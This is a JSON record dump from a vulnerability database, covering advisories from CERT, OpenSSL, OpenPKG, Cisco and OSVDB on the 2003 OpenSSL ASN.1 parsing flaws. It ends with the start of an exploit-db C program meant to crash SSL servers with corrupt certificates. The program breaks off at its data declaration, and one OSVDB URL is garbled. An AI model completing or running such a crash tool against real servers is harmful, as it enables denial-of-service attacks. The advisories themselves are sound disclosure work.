hotline&#41;\r\n Fax: +1 412-268-6989\r\n Postal address:\r\n CERT Coordination Center\r\n Software Engineering Institute\r\n Carnegie Mellon University\r\n Pittsburgh PA 15213-3890\r\n U.S.A.\r\n\r\n CERT/CC personnel answer the hotline 08:00-17:00 EST&#40;GMT-5&#41; /\r\n EDT&#40;GMT-4&#41; Monday through Friday; they are on call for emergencies\r\n during other hours, on U.S. holidays, and on weekends.\r\n\r\nUsing encryption\r\n\r\n We strongly urge you to encrypt sensitive information sent by email.\r\n Our public PGP key is available from\r\n\r\n http://www.cert.org/CERT_PGP.key\r\n\r\n If you prefer to use DES, please call the CERT hotline for more\r\n information.\r\n\r\nGetting security information\r\n\r\n CERT publications and other security information are available from\r\n our web site\r\n\r\n http://www.cert.org/\r\n\r\n To subscribe to the CERT mailing list for advisories and bulletins,\r\n send email to majordomo@cert.org. Please include in the body of your\r\n message\r\n\r\n subscribe cert-advisory\r\n\r\n * &quot;CERT&quot; and &quot;CERT Coordination Center&quot; are registered in the U.S.\r\n Patent and Trademark Office.\r\n ______________________________________________________________________\r\n\r\n NO WARRANTY\r\n Any material furnished by Carnegie Mellon University and the Software\r\n Engineering Institute is furnished on an &quot;as is&quot; basis. Carnegie\r\n Mellon University makes no warranties of any kind, either expressed or\r\n implied as to any matter including, but not limited to, warranty of\r\n fitness for a particular purpose or merchantability, exclusivity or\r\n results obtained from use of the material. Carnegie Mellon University\r\n does not make any warranty of any kind with respect to freedom from\r\n patent, trademark, or copyright infringement.\r\n ______________________________________________________________________\r\n\r\n Conditions for use, disclaimers, and sponsorship information\r\n\r\n Copyright 2003 Carnegie Mellon University.\r\n\r\n Revision History\r\n\r\n October 1, 2003: Initial release\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 6.5.8\r\n\r\niQCVAwUBP3thtTpmH2w9K/0VAQGzWAP9EpSwNUVNzSsGJjCLIX4jAKdGizhNEA/f\r\nZED6pvYreSwcry5SLvBMsn9vfftOdcIM1T9iPmWNm5KxQ1EsnlkojkMHdfPON56o\r\nWpwwnLo89TxhNWgd7ThYbqXbIIPzfi0g6FM3lW4OVKEX/itscX83WPoUHp9OYBb9\r\npFFrq38EPjE=\r\n=NRed\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2003-10-03T00:00:00", "published": "2003-10-03T00:00:00", "id": "SECURITYVULNS:DOC:5186", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5186", "title": "CERT Advisory CA-2003-26 Multiple Vulnerabilities in SSL/TLS Implementations", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:08", "bulletinFamily": "software", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\nOpenSSL Security Advisory [30 September 2003]\r\n\r\nVulnerabilities in ASN.1 parsing\r\n================================\r\n\r\nNISCC &#40;www.niscc.gov.uk&#41; prepared a test suite to check the operation\r\nof SSL/TLS software when presented with a wide range of malformed client\r\ncertificates.\r\n\r\nDr Stephen Henson &#40;steve@openssl.org&#41; of the OpenSSL core team\r\nidentified and prepared fixes for a number of vulnerabilities in the\r\nOpenSSL ASN1 code when running the test suite.\r\n\r\nA bug in OpenSSLs SSL/TLS protocol was also identified which causes\r\nOpenSSL to parse a client certificate from an SSL/TLS client when it\r\nshould reject it as a protocol error.\r\n\r\nVulnerabilities\r\n- ---------------\r\n\r\n1. Certain ASN.1 encodings that are rejected as invalid by the parser\r\ncan trigger a bug in the deallocation of the corresponding data\r\nstructure, corrupting the stack. This can be used as a denial of service\r\nattack. It is currently unknown whether this can be exploited to run\r\nmalicious code. This issue does not affect OpenSSL 0.9.6.\r\n\r\n2. Unusual ASN.1 tag values can cause an out of bounds read under\r\ncertain circumstances, resulting in a denial of service vulnerability.\r\n\r\n3. A malformed public key in a certificate will crash the verify code if\r\nit is set to ignore public key decoding errors. Public key decode errors\r\nare not normally ignored, except for debugging purposes, so this is\r\nunlikely to affect production code. Exploitation of an affected\r\napplication would result in a denial of service vulnerability.\r\n\r\n4. Due to an error in the SSL/TLS protocol handling, a server will parse\r\na client certificate when one is not specifically requested. This by\r\nitself is not strictly speaking a vulnerability but it does mean that\r\n*all* SSL/TLS servers that use OpenSSL can be attacked using\r\nvulnerabilities 1, 2 and 3 even if they don&#39;t enable client authentication.\r\n\r\nWho is affected?\r\n- ----------------\r\n\r\nAll versions of OpenSSL up to and including 0.9.6j and 0.9.7b and all\r\nversions of SSLeay are affected.\r\n\r\nAny application that makes use of OpenSSL&#39;s ASN1 library to parse\r\nuntrusted data. This includes all SSL or TLS applications, those using\r\nS/MIME &#40;PKCS#7&#41; or certificate generation routines.\r\n\r\nRecommendations\r\n- ---------------\r\n\r\nUpgrade to OpenSSL 0.9.7c or 0.9.6k. Recompile any OpenSSL applications\r\nstatically linked to OpenSSL libraries.\r\n\r\nReferences\r\n- ----------\r\n\r\nThe Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41; has\r\nassigned the name CAN-2003-0545 for issue 1:\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0545\r\n\r\nand CAN-2003-0543 and CAN-2003-0544 for issue 2:\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0543\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0544\r\n\r\nURL for this Security Advisory:\r\nhttp://www.openssl.org/news/secadv_20030930.txt\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 &#40;GNU/Linux&#41;\r\n\r\niQCVAwUBP3mNKu6tTP1JpWPZAQFjPwP/Y8epYBa9oCK69dCT5Y90kg9Ir8pYuv+q\r\nx4NxuyhD5JaJfmStwbl3BUSE5juI0mh7d6yFjfI0Ci3sdC+5v10ZOanGwX7o4JlS\r\n3pGSSocAEiYS59qciRLtFsCbBt8jIOCG8KiTmKO2mI5dhAEB9UqPH9e8A1Wy/8un\r\nxjGKYbcITrM=\r\n=fFTe\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n", "edition": 1, "modified": "2003-09-30T00:00:00", "published": "2003-09-30T00:00:00", "id": "SECURITYVULNS:DOC:5178", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5178", "title": "[Full-Disclosure] [OpenSSL Advisory] Vulnerabilities in ASN.1 parsing", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:08", "bulletinFamily": "software", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n________________________________________________________________________\r\n\r\nOpenPKG Security Advisory The OpenPKG Project\r\nhttp://www.openpkg.org/security.html http://www.openpkg.org\r\nopenpkg-security@openpkg.org openpkg@openpkg.org\r\nOpenPKG-SA-2003.044 30-Sep-2003\r\n________________________________________________________________________\r\n\r\nPackage: openssl\r\nVulnerability: denial of service, possibly arbitrary code execution\r\nOpenPKG Specific: no\r\n\r\nAffected Releases: Affected Packages: Corrected Packages:\r\nOpenPKG CURRENT &lt;= openssl-0.9.7b-20030806 &gt;= openssl-0.9.7b-20030930\r\nOpenPKG 1.3 &lt;= openssl-0.9.7b-1.3.1 &gt;= openssl-0.9.7b-1.3.2\r\nOpenPKG 1.2 &lt;= openssl-0.9.7-1.2.3 &gt;= openssl-0.9.7-1.2.4\r\n\r\nAffected Releases: Dependent Packages:\r\n\r\nOpenPKG CURRENT apache* bind blender cadaver cfengine cpu cups curl\r\n distcache dsniff easysoap ethereal* exim fetchmail\r\n imap imapd imaputils inn jabberd kde-base kde-libs\r\n linc links lynx mailsync meta-core mico* mixmaster\r\n monit* mozilla mutt mutt15 nail neon nessus-libs\r\n nmap openldap openssh openvpn perl-ssl pgadmin php*\r\n pine* postfix* postgresql pound proftpd* qpopper\r\n rdesktop samba samba3 sasl scanssh sendmail* siege\r\n sio* sitecopy snmp socat squid* stunnel subversion\r\n suck sysmon tcpdump tinyca w3m wget xmlsec\r\n\r\nOpenPKG 1.3 apache* bind cfengine cpu curl ethereal* fetchmail\r\n imap imapd inn links lynx mico* mutt nail neon\r\n openldap openssh perl-ssl php* postfix* postgresql\r\n proftpd* qpopper rdesktop samba sasl scanssh\r\n sendmail* siege sio* sitecopy snmp socat squid*\r\n stunnel suck sysmon tcpdump tinyca w3m wget xmlsec\r\n\r\nOpenPKG 1.2 apache* bind cpu curl ethereal* fetchmail imap inn\r\n links lynx mico* mutt nail neon openldap openssh\r\n perl-ssl postfix* postgresql qpopper rdesktop samba\r\n sasl scanssh sendmail* siege sitecopy snmp socat\r\n stunnel sysmon tcpdump tinyca w3m wget\r\n\r\n &#40;*&#41; marked packages are only affected if certain build\r\n options &#40;&quot;with_xxx&quot;&#41; were used at build time. See\r\n Appendix below for details.\r\n\r\nDescription:\r\n According to an OpenSSL [0] security advisory [1], multiple\r\n vulnerabilities exist in OpenSSL versions up to and including 0.9.6j\r\n and 0.9.7b:\r\n\r\n 1. Certain ASN.1 encodings that are rejected as invalid by the ASN.1\r\n parser can trigger a bug in the deallocation of the corresponding\r\n data structure, corrupting the stack.\r\n\r\n 2. Unusual ASN.1 tag values can cause an out of bounds read under\r\n certain circumstances.\r\n\r\n 3. A malformed public key in a certificate will crash the verify code\r\n if it is set to ignore public key decoding errors &#40;which is usually\r\n not the case, except for debugging purposes&#41;.\r\n\r\n 4. Due to an error in the SSL/TLS protocol handling, a server will\r\n parse a client certificate when one is not specifically requested.\r\n This means that all OpenSSL based SSL/TLS servers can be attacked\r\n using vulnerabilities 1, 2 and 3 even if they don&#39;t enable client\r\n authentication.\r\n\r\n The Common Vulnerabilities and Exposures &#40;CVE&#41; project assigned the\r\n ids CAN-2003-0543 [2], CAN-2003-0544 [3] and CAN-2003-0545 [4] to the\r\n problems.\r\n\r\n Please check whether you are affected by running &quot;&lt;prefix&gt;/bin/rpm -q\r\n openssl&quot;. If you have the &quot;openssl&quot; package installed and its version\r\n is affected &#40;see above&#41;, we recommend that you immediately upgrade it\r\n &#40;see Solution&#41; and it&#39;s dependent packages &#40;see above&#41;, too. [5][6]\r\n\r\nSolution:\r\n Select the updated source RPM appropriate for your OpenPKG release\r\n [7][8], fetch it from the OpenPKG FTP service [9][10] or a mirror\r\n location, verify its integrity [11], build a corresponding binary\r\n RPM from it [5] and update your OpenPKG installation by applying the\r\n binary RPM [6]. For the current release OpenPKG 1.3, perform the\r\n following operations to permanently fix the security problem &#40;for\r\n other releases adjust accordingly&#41;.\r\n\r\n $ ftp ftp.openpkg.org\r\n ftp&gt; bin\r\n ftp&gt; cd release/1.3/UPD\r\n ftp&gt; get openssl-0.9.7b-1.3.2.src.rpm\r\n ftp&gt; bye\r\n $ &lt;prefix&gt;/bin/rpm -v --checksig openssl-0.9.7b-1.3.2.src.rpm\r\n $ &lt;prefix&gt;/bin/rpm --rebuild openssl-0.9.7b-1.3.2.src.rpm\r\n $ su -\r\n # &lt;prefix&gt;/bin/rpm -Fvh &lt;prefix&gt;/RPM/PKG/openssl-0.9.7b-1.3.2.*.rpm\r\n\r\n Additionally, we you have to rebuild and reinstall all dependent\r\n packages &#40;see above&#41;, too. [5][6]\r\n________________________________________________________________________\r\n\r\nAppendix:\r\n Some packages are only affected if certain package options\r\n &#40;&quot;with_xxx&quot;&#41; were used at build time. Please check whether you are\r\n affected by running &quot;&lt;prefix&gt;/bin/rpm -qi &lt;package&gt;&quot;. The table below\r\n lists all those packages, their options and values that make up the\r\n difference regarding this advisory for OpenPKG CURRENT, 1.3 and 1.2.\r\n Packages or options that were not available in a particular release\r\n are marked &quot;=&quot;.\r\n\r\n package option &quot;with_&quot; CUR 1.3 1.2\r\n -----------------------------------------\r\n apache mod_ssl yes yes yes\r\n : mod_php_pgsql yes yes =\r\n : mod_php_openssl yes yes yes\r\n : mod_php_openldap yes yes yes\r\n : mod_php_imap yes yes =\r\n : mod_php3_openssl yes yes yes\r\n : mod_auth_ldap yes yes yes\r\n ethereal openssl yes yes yes\r\n mico ssl yes yes yes\r\n monit ssl yes = =\r\n php openssl yes yes =\r\n : imap yes yes =\r\n pine ssl yes = =\r\n postfix tls yes yes yes\r\n : ldap yes yes =\r\n proftpd pgsql yes yes =\r\n : ldap yes yes =\r\n sendmail tls yes yes yes\r\n : sasl yes yes yes\r\n : ldap yes yes yes\r\n sio bio yes yes =\r\n squid ssl yes yes =\r\n________________________________________________________________________\r\n\r\nReferences:\r\n [0] http://www.openssl.org/\r\n [1] http://www.openssl.org/news/secadv_20030930.txt\r\n [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0543\r\n [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0544\r\n [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0545\r\n [5] http://www.openpkg.org/tutorial.html#regular-source\r\n [6] http://www.openpkg.org/tutorial.html#regular-binary\r\n [7] ftp://ftp.openpkg.org/release/1.2/UPD/openssl-0.9.7-1.2.4.src.rpm\r\n [8] ftp://ftp.openpkg.org/release/1.3/UPD/openssl-0.9.7b-1.3.2.src.rpm\r\n [9] ftp://ftp.openpkg.org/release/1.2/UPD/\r\n [10] ftp://ftp.openpkg.org/release/1.3/UPD/\r\n [11] http://www.openpkg.org/security.html#signature\r\n________________________________________________________________________\r\n\r\nFor security reasons, this advisory was digitally signed with the\r\nOpenPGP public key &quot;OpenPKG &lt;openpkg@openpkg.org&gt;&quot; &#40;ID 63C4CB9F&#41; of the\r\nOpenPKG project which you can retrieve from http://pgp.openpkg.org and\r\nhkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/\r\nfor details on how to verify the integrity of this advisory.\r\n________________________________________________________________________\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nComment: OpenPKG &lt;openpkg@openpkg.org&gt;\r\n\r\niD8DBQE/eX0UgHWT4GPEy58RAplhAJ0c+GMqHgDjrgIYdcCkgKi/jzgWtgCeLc5T\r\nB84GXRZS675YJYwrEc5Audk=\r\n=+vWe\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2003-09-30T00:00:00", "published": "2003-09-30T00:00:00", "id": "SECURITYVULNS:DOC:5177", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5177", "title": "Subject: [OpenPKG-SA-2003.044] OpenPKG Security Advisory &#40;openssl&#41;", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2020-12-24T11:42:15", "bulletinFamily": "software", "cvelist": ["CVE-2003-0543", "CVE-2003-0544", "CVE-2003-0545", "CVE-2003-0851", "CVE-2005-1247"], "description": "", "modified": "2003-09-30T23:30:00", "published": "2003-09-30T23:30:00", "id": "CISCO-SA-20030930-SSL", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20030930-ssl", "type": "cisco", "title": "SSL Implementation Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2003-0544"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in OpenSSL. OpenSSL fails to correctly parse ASN.1 tags in OpenSSL client certificates, resulting in a buffer overflow. With a specially crafted request, an attacker can cause denial of service in OpenSSL or an application using it, resulting in a loss of availability.\n## Technical Description\nOpenSSL does not properly track the number of characters in certain ASN.1 inputs in SSL client certificates. This allows local and remote attackers to cause a denial of service (crash) in OpenSSL itself or the application using it via a buffer overflow triggered in the long form of a crafted SSL client certificate.\n## Solution Description\nUpgrade to version 0.9.7c or 0.9.6k or higher, as it has been reported to fix this vulnerability, and recompile any OpenSSL applications statically linked to OpenSSL libraries. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in OpenSSL. OpenSSL fails to correctly parse ASN.1 tags in OpenSSL client certificates, resulting in a buffer overflow. With a specially crafted request, an attacker can cause denial of service in OpenSSL or an application using it, resulting in a loss of availability.\n## References:\nVendor URL: http://www-03.ibm.com/servers/eserver/xseries/systems_management/ibm_director/resources/index.html\nVendor Specific News/Changelog Entry: ftp://ftp.software.ibm.com/pc/pccbbs/pc_servers/dir5.10.3_docs_relnotes.pdf\nVendor Specific News/Changelog Entry: http://www.ingate.com/relnote-331.php\nVendor Specific News/Changelog Entry: http://www.cyberguard.info/snapgear/releases.html\n[Vendor Specific Advisory URL](http://support.novell.com/cgi-bin/search/searchtid.cgi?/2967209.htm)\n[Vendor Specific Advisory URL](http://support.novell.com/cgi-bin/search/searchtid.cgi?/2967208.htm)\n[Vendor Specific Advisory URL](http://support.novell.com/cgi-bin/search/searchtid.cgi?/2967439.htm)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.29/CSSA-2003-SCO.29.txt)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20030904-02-P.asc)\n[Vendor Specific Advisory URL](http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0310-288)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](http://supportconnect.ca.com/sc/solcenter/sol_detail.jsp?aparno=QO58123&os=NT&returninput=0)\n[Vendor Specific Advisory URL](http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0310-290)\n[Vendor Specific Advisory URL](http://support.novell.com/cgi-bin/search/searchtid.cgi?/2967210.htm)\n[Vendor Specific Advisory URL](http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:098)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2003_043_openssl.html)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57599)\n[Vendor Specific Advisory URL](https://rhn.redhat.com/errata/RHSA-2003-293.html)\n[Vendor Specific Advisory URL](http://www.hitachi-support.com/security_e/vuls_e/HS03-007_e/index-e.html)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg21247112)\n[Vendor Specific Advisory URL](http://support.novell.com/cgi-bin/search/searchtid.cgi?/2968007.htm)\n[Vendor Specific Advisory URL](http://otn.oracle.com/deploy/security/pdf/2003alert62.pdf)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57472)\n[Vendor Specific Advisory URL](http://www.slackware.com/lists/archive/viewer.php?l=slackware-security&y=2003&m=slackware-security.464492)\n[Vendor Specific Advisory URL](http://www.linuxsecurity.com/advisories/engarde_advisory-3693.html)\n[Vendor Specific Advisory URL](http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0310-284)\n[Vendor Specific Advisory URL](http://www.openbsd.org/errata.html#asn1)\n[Vendor Specific Advisory URL](http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0310-286)\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/cisco-sa-20030930-ssl.shtml)\n[Vendor Specific Advisory URL](https://rhn.redhat.com/errata/RHSA-2003-292.html)\n[Vendor Specific Advisory URL](https://rhn.redhat.com/errata/RHSA-2003-291.html)\n[Vendor Specific Advisory URL](http://www.openssl.org/news/secadv_20030930.txt)\n[Vendor Specific Advisory URL](http://www.vmware.com/download/esx/esx2-openssh.html)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57444)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/UnixWare/CSSA-2003-SCO.25/CSSA-2003-SCO.25.txt)\n[Vendor Specific Advisory URL](ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03%3A18.openssl.asc)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57498)\n[Vendor Specific Advisory URL](http://www.stonesoft.com/document/art/3040.html)\n[Vendor Specific Advisory URL](http://support.novell.com/cgi-bin/search/searchtid.cgi?/2968981.htm)\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-017.txt.asc)\n[Secunia Advisory ID:9886](https://secuniaresearch.flexerasoftware.com/advisories/9886/)\n[Secunia Advisory ID:9897](https://secuniaresearch.flexerasoftware.com/advisories/9897/)\n[Secunia Advisory ID:9903](https://secuniaresearch.flexerasoftware.com/advisories/9903/)\n[Secunia Advisory ID:9910](https://secuniaresearch.flexerasoftware.com/advisories/9910/)\n[Secunia Advisory ID:11728](https://secuniaresearch.flexerasoftware.com/advisories/11728/)\n[Secunia Advisory ID:22249](https://secuniaresearch.flexerasoftware.com/advisories/22249/)\n[Secunia Advisory ID:11325](https://secuniaresearch.flexerasoftware.com/advisories/11325/)\n[Secunia Advisory ID:10170](https://secuniaresearch.flexerasoftware.com/advisories/10170/)\n[Secunia Advisory ID:9908](https://secuniaresearch.flexerasoftware.com/advisories/9908/)\n[Secunia Advisory ID:11697](https://secuniaresearch.flexerasoftware.com/advisories/11697/)\nOther Advisory URL: http://www.bluecoat.com/support/knowledge/advisory_openSSL_ASN_vulnerability.html\nOther Advisory URL: http://www.tarantella.com/security/bulletin-08.html\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57475\nOther Advisory URL: http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm\nOther Advisory URL: http://www.ingate.com/relnote-331.php\nOther Advisory URL: http://www.stonesoft.com/document/art/3040.html\nOther Advisory URL: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=104893\nOther Advisory URL: http://www.smoothwall.org/home/news/item/20031001.01.html\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57444\nOther Advisory URL: http://www.debian.org/security/2003/dsa-394\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57498\nOther Advisory URL: http://www.debian.org/security/2003/dsa-393\n[Nessus Plugin ID:11875](https://vulners.com/search?query=pluginID:11875)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-10/0342.html\nISS X-Force ID: 13322\nISS X-Force ID: 13317\nISS X-Force ID: 13316\n[CVE-2003-0544](https://vulners.com/cve/CVE-2003-0544)\nCERT: CA-2003-26\nBugtraq ID: 8732\n", "modified": "2003-07-14T00:00:00", "published": "2003-07-14T00:00:00", "id": "OSVDB:3686", "href": "https://vulners.com/osvdb/OSVDB:3686", "title": "OpenSSL ASN.1 Client Certificate Overflow DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2003-0543"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in OpenSSL. OpenSSL fails to correctly handle error conditions in ASN.1 tags in SSL client certificates, resulting in a integer overflow. With a specially crafted request, an attacker can cause a denial of service in OpenSSL or an application using it, resulting in a loss of availability.\n## Technical Description\nUnusual ASN.1 tag values in a client certificate can force an integer overflow and cause an out of bounds read under certain circumstances, resulting in a denial of service (crash) vulnerability.\n## Solution Description\nUpgrade to version 0.9.7c or 0.9.6k. or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Recompile any OpenSSL applications statically linked to OpenSSL libraries.\n## Short Description\nA remote overflow exists in OpenSSL. OpenSSL fails to correctly handle error conditions in ASN.1 tags in SSL client certificates, resulting in a integer overflow. With a specially crafted request, an attacker can cause a denial of service in OpenSSL or an application using it, resulting in a loss of availability.\n## References:\nVendor URL: http://www-03.ibm.com/servers/eserver/xseries/systems_management/ibm_director/resources/index.html\nVendor Specific News/Changelog Entry: ftp://ftp.software.ibm.com/pc/pccbbs/pc_servers/dir5.10.3_docs_relnotes.pdf\nVendor Specific News/Changelog Entry: http://www.ingate.com/relnote-331.php\nVendor Specific News/Changelog Entry: http://www.cyberguard.info/snapgear/releases.html\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](http://supportconnect.ca.com/sc/solcenter/sol_detail.jsp?aparno=QO58123&os=NT&returninput=0)\n[Vendor Specific Advisory URL](http://www.openbsd.org/errata33.html#asn1)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57599)\n[Vendor Specific Advisory URL](http://www.hitachi-support.com/security_e/vuls_e/HS03-007_e/index-e.html)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg21247112)\n[Vendor Specific Advisory URL](http://www.openssl.org/news/secadv_20030930.txt)\n[Vendor Specific Advisory URL](http://support.novell.com/cgi-bin/search/searchtid.cgi?/2968981.htm)\n[Secunia Advisory ID:9814](https://secuniaresearch.flexerasoftware.com/advisories/9814/)\n[Secunia Advisory ID:11728](https://secuniaresearch.flexerasoftware.com/advisories/11728/)\n[Secunia Advisory ID:22249](https://secuniaresearch.flexerasoftware.com/advisories/22249/)\n[Secunia Advisory ID:10057](https://secuniaresearch.flexerasoftware.com/advisories/10057/)\n[Secunia Advisory ID:9916](https://secuniaresearch.flexerasoftware.com/advisories/9916/)\n[Secunia Advisory ID:11697](https://secuniaresearch.flexerasoftware.com/advisories/11697/)\nOther Advisory URL: http://www.bluecoat.com/support/knowledge/advisory_openSSL_ASN_vulnerability.html\nOther Advisory URL: http://www.tarantella.com/security/bulletin-08.html\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57475\nOther Advisory URL: http://www.ingate.com/relnote-331.php\nOther Advisory URL: http://www.stonesoft.com/document/art/3040.html\nOther Advisory URL: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=104893\nOther Advisory URL: http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm\nOther Advisory URL: http://www.smoothwall.org/home/news/item/20031001.01.html\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57444\nOther Advisory URL: http://www.debian.org/security/2003/dsa-394\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?dochttp://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/5749857498=fsalert/57498\nOther Advisory URL: http://www.debian.org/security/2003/dsa-393\n[Nessus Plugin ID:11060](https://vulners.com/search?query=pluginID:11060)\n[Nessus Plugin ID:11875](https://vulners.com/search?query=pluginID:11875)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-10/0342.html\nISS X-Force ID: 13322\nISS X-Force ID: 13316\nISS X-Force ID: 13315\n[CVE-2003-0543](https://vulners.com/cve/CVE-2003-0543)\nCERT: CA-2003-26\nBugtraq ID: 5366\nBugtraq ID: 8732\n", "modified": "2003-09-30T00:00:00", "published": "2003-09-30T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:3949", "id": "OSVDB:3949", "type": "osvdb", "title": "OpenSSL ASN.1 Integer Overflow DoS", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T11:48:41", "description": "Brute forcer for OpenSSL ASN.1 parsing bugs (. CVE-2003-0543. Dos exploits for multiple platform", "published": "2003-10-09T00:00:00", "type": "exploitdb", "title": "OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0543"], "modified": "2003-10-09T00:00:00", "id": "EDB-ID:146", "href": "https://www.exploit-db.com/exploits/146/", "sourceData": "/* Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)\r\n * written by Bram Matthys (Syzop) on Oct 9 2003.\r\n *\r\n * This program sends corrupt client certificates to the SSL\r\n * server which will 1) crash it 2) create lots of error messages,\r\n * and/or 3) result in other \"interresting\" behavior.\r\n *\r\n * I was able to crash my own ssl app in 5-15 attempts,\r\n * apache-ssl only generated error messages but after several hours\r\n * some childs went into some kind of eat-all-cpu-loop... so YMMV.\r\n *\r\n * It's quite ugly but seems to compile at Linux/FreeBSD.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <ctype.h>\r\n#include <string.h>\r\n#include <sys/signal.h>\r\n#include <arpa/nameser.h>\r\n#include <sys/time.h>\r\n#include <time.h>\r\n#include <errno.h>\r\n\r\nchar buf[8192];\r\n\r\n/* This was simply sniffed from an stunnel session */\r\nconst char dacrap[] = 